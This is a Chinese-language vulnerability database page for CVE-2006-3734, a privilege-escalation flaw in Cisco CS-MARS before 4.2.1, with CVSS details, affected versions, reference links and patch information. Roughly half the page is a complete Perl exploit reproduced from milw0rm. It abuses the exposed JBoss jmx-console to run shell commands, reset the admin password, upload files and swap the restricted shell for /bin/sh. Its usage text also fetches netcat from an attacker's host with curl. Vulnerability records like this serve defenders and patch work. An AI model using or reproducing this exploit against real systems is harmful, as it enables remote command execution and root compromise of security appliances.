CVE-2006-3734
CVSS7.2
发布时间 :2006-07-21 10:03:00
修订时间 :2011-03-07 21:39:21
NMCOE    

[原文]Multiple unspecified vulnerabilities in the Command Line Interface (CLI) for Cisco Security Monitoring, Analysis and Response System (CS-MARS) before 4.2.1, allow local CS-MARS administrators to execute arbitrary commands as root.


[CNNVD]Cisco CS-MARS多个权限提升漏洞(CNNVD-200607-291)

         Cisco安全监控、分析和响应系统(CS-MARS)可从各种网络设备接收事件日志,关联并分析接收到的安全问题数据,并报告发现。
         CS-MARS CLI是一个受限的shell环境,允许通过认证的管理员执行系统维护任务。CLI的实现上存在几个权限提升漏洞,可能允许在基础设备操作系统上以root用户权限执行shell命令。

- CVSS (基础分值)

CVSS分值: 7.2 [严重(HIGH)]
机密性影响: COMPLETE [完全的信息泄露导致所有系统文件暴露]
完整性影响: COMPLETE [系统完整性可被完全破坏]
可用性影响: COMPLETE [可能导致系统完全宕机]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: LOCAL [漏洞利用需要具有物理访问权限或本地帐户]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/h:cisco:cs-mars:4.1.3Cisco CS-MARS 4.1.3
cpe:/h:cisco:cs-mars:4.1.2Cisco CS-MARS 4.1.2
cpe:/h:cisco:cs-mars:4.1.5Cisco CS-MARS 4.1.5
cpe:/h:cisco:cs-mars:4.1Cisco CS-MARS 4.1

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3734
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-3734
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200607-291
(官方数据源) CNNVD

- 其它链接及资源

http://www.securityfocus.com/bid/19071
(PATCH)  BID  19071
http://www.cisco.com/warp/public/707/cisco-sa-20060719-mars.shtml
(PATCH)  CISCO  20060719 Multiple Vulnerabilities in Cisco Security Monitoring, Analysis and Response System (CS-MARS)
http://securitytracker.com/id?1016537
(PATCH)  SECTRACK  1016537
http://secunia.com/advisories/21118
(VENDOR_ADVISORY)  SECUNIA  21118
http://xforce.iss.net/xforce/xfdb/27812
(UNKNOWN)  XF  cisco-cli-command-execution(27812)
http://www.vupen.com/english/advisories/2006/2887
(UNKNOWN)  VUPEN  ADV-2006-2887
http://www.securityfocus.com/bid/19077
(UNKNOWN)  BID  19077

- 漏洞信息

Cisco CS-MARS多个权限提升漏洞
高危 设计错误
2006-07-21 00:00:00 2006-08-09 00:00:00
本地  
         Cisco安全监控、分析和响应系统(CS-MARS)可从各种网络设备接收事件日志,关联并分析接收到的安全问题数据,并报告发现。
         CS-MARS CLI是一个受限的shell环境,允许通过认证的管理员执行系统维护任务。CLI的实现上存在几个权限提升漏洞,可能允许在基础设备操作系统上以root用户权限执行shell命令。

- 公告与补丁

        目前厂商已经发布了升级补丁以修复这个安全问题,补丁下载链接:
        http://www.cisco.com/warp/public/707/cisco-sa-20060719-mars.shtml
        http://www.cisco.com/pcgi-bin/tablebuild.pl/cs-mars?psrtdcat20e2

- 漏洞信息 (2048)

Cisco/Protego CS-MARS < 4.2.1 (JBoss) Remote Code Execution Exploit (EDBID:2048)
hardware remote
2006-07-20 Verified
0 Jon Hart
N/A [点击下载]
#!/usr/bin/perl
# 
# Cisco/Protego CS-MARS < 4.2.1 remote command execution, system compromise
# via insecure JBoss installation.
#
# Fully functional POC code by Jon Hart <jhart@spoofed.org>
#
# Addressed in CSCse47646
#
# CS-MARS is an event correlation product orginally written by Protego,
# which is now owned by Cisco.  It is built on top of JBoss.
# Unfortunately, little or no effort was put in to securing the JBoss
# installation as per the JBoss community's recommended best practices.
# A such, the usual set of JBoss interfaces are wide open and it is up to
# the attacker how creative they want to be in compromising the box.  This
# particular exploit vector abuses the JBoss jmx-console for all sorts of
# fun.  It should also be noted that, because of the very old kernel
# running on most CS-MARS boxes (2.4.9), once JBoss is compromised, root is
# almost trivial.  Thanks to Cisco PSIRT and Matt Cerha for their
# cooperation in getting this fixed.
#
#################################
#  Copyright (C) 2006 Jon Hart
#
#  This program is free software; you can redistribute it and/or modify it
#  under the terms of the GNU General Public License as published by the Free
#  Software Foundation; either version 2 of the License, or (at your option)
#  any later version.
#
#  This program is distributed in the hope that it will be useful, but WITHOUT
#  ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or
#  FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for
#  more details.
#
#  You should have received a copy of the GNU General Public License along with
#  this program; if not, write to the Free Software Foundation, Inc., 59 Temple
#  Place, Suite 330, Boston, MA 02111-1307 USA
#
#
#################################
#

use strict;
use HTTP::Request::Common;
use LWP::UserAgent;
use IO::Socket;

my $target = shift(@ARGV) || &usage;
my $attack_type = shift(@ARGV) || &usage; 

for ($attack_type) {
   if    (/pass/) { &change_passwd(@ARGV); }
   elsif (/cmd/) { &run_cmd(@ARGV); }
   elsif (/upload/) { &upload(@ARGV); }
   elsif (/[bean|bsh]/) { &run_bsh(@ARGV); }
   else { &usage; }
} 

sub change_passwd {
   my $passwd = shift;
   &run_cmd("/opt/janus/release/bin/pnpasswd $passwd");
}

sub encode {
   my $en = shift;
   my $string = "";
   foreach my $char (split(//, $en)) {
      if ($char =~ /([:|\/|(|)|"|'|`| ])/) {
         $string .= sprintf("%%%x", ord($1));
      } else { $string .= $char; }
   }
   return $string;
}

sub jmx_post {
   my $form_data = shift; 
   my $ua = LWP::UserAgent->new;
   $ua->agent("Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)");
   my $req = HTTP::Request->new(POST => "http://$target/jmx-console/HtmlAdaptor");
   $req->content_type('application/x-www-form-urlencoded');
   $req->content(&encode($form_data));

   my $res = $ua->request($req);

   return $res->is_success ? 0 : $res->status_line;
}

sub run_bsh {
   my $file = shift;
   my $bsh = "";
   open(BSH, "$file") or die "Couldn't open $file: $!\n";
   print("Sending beanshell from $file: ");
   while (<BSH>) {
      # the bsh must be one long string...
      chomp();
      $bsh .= $_;
   }
   
   printf("%s\n", &send_beanshell($bsh) == 0 ? "Success" : "Failed");
}

sub run_cmd {
   my $cmd = shift; 
   my $code = "";
  
   # & in the command needs to be encoded so as to not be confused with the &
   # in the URI
   $cmd =~ s/&/%26/g;
   if ($cmd =~ />|\||&/) {
      # exec() does not handle pipes or redirection well, so do this instead
      $code = 'String sh = "/bin/sh"; String opt = "-c"; String cmd = "'
            . $cmd .
            '"; String[] exec = new String[] { sh, opt, cmd }; Runtime.getRuntime().exec(exec);';
   } else {
      $code = "Runtime.getRuntime().exec(\"$cmd\");";
   }

   print("Running '$cmd' on $target: ");
   printf("%s\n", &send_beanshell($code) == 0 ? "Success" : "Failed!");
}

sub send_beanshell {
   my $code = shift;
   # ensure the name of the bsh job within java has a unique name
   my $name = "cmd" . int(rand(65535)) . $$;
   return &jmx_post("action=invokeOp&name=jboss.scripts:service=BSHDeployer&methodIndex=1&arg0=$code&arg1=$name");
}

sub upload {
   # upload a file.  I was too lazy to use org.jboss.console.manager.DeploymentFileRepository
   my $file = shift;
   my $path = shift;
   my $new_name = shift;
   my $chunk = "";
   my $ret = 0;
   open(FILE, "< $file") or die "Couldn't open $file for reading: $!\n";

   if (!(defined($new_name))) {
      my @path = split(/\//, $file);
      $new_name = $path[$#path];
   }

   print("Uploading $file to $target...\n");
   &run_cmd("touch $path/$new_name");
   while(read(FILE,$chunk,4096)) {
      # encode this file in 4096 byte chunks in a format that is able to be handled by JBoss.
      # There are plenty of ways to do this, but none that were both portable and that didn't make JBoss 
      # throw a 500 or otherwise botch the file.  UGLY.
      $chunk = join('', map { sprintf("%03d,", ord("$_")) } split(//, $chunk));
      $ret += &run_cmd("echo -n $chunk | perl -ne 'foreach (split(/,/, \$_)) { print chr(\$_); }' >> $path/$new_name");
   }

   printf("Upload of $file to $target:$path/new_name %s!\n", $ret == 0 ? "succeeded" : "failed");
}


sub usage {
   print <<EOF;
   Cisco MARS (CS-MARS) < 4.2.1 JBoss exploit (CSCse47646) POC by Jon Hart <jhart\@spoofed.org>

   Basic Usage:
      $0 <target> <exploit_type> [<exploit_specific_args] ...]

   Extended Usage:
      Change password:
      $0 <target> pass <password>
      Run shell command:
      $0 <target> cmd <your quoted shell command>
      Run BeanShell code:
      $0 <target> bsh /path/to/file/with/beanshell
      Upload files:
      $0 <target> upload <file to upload> <path on target> [<new name>]

      Fun Stuff:
         Get a real shell:
         $0 <target> cmd "cp /opt/janus/release/bin/pnsh /opt/janus/release/bin/pnsh.bak"
         $0 <target> cmd "rm  /opt/janus/release/bin/pnsh"
         $0 <target> cmd "cp /bin/sh /opt/janus/release/bin/pnsh"
         # now ssh to the target...
         [pnadmin\@pnmars bin]\$ id
         uid=501(pnadmin) gid=501(pnadmin) groups=501(pnadmin)
         [pnadmin\@pnmars bin]\$ uname -a
         Linux pnmars 2.4.9-e.57 #1 Thu Dec 2 20:56:19 EST 2004 i686 unknown
         [pnadmin\@pnmars bin]\$ hostname
         pnmars
         
         Download something:
         $0 <target> cmd "curl http://yourhost/nc -o /tmp/nc"

EOF
exit(1);
}

# milw0rm.com [2006-07-20]
		

- 漏洞信息

33069
Cisco CS-MARS Arbitrary Command Execution Local Privilege Escalation
Local Access Required
Loss of Integrity Upgrade
Vendor Verified

- 漏洞描述

- 时间线

2006-07-19 Unknow
Unknow Unknow

- 解决方案

Upgrade to version 4.2.1 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站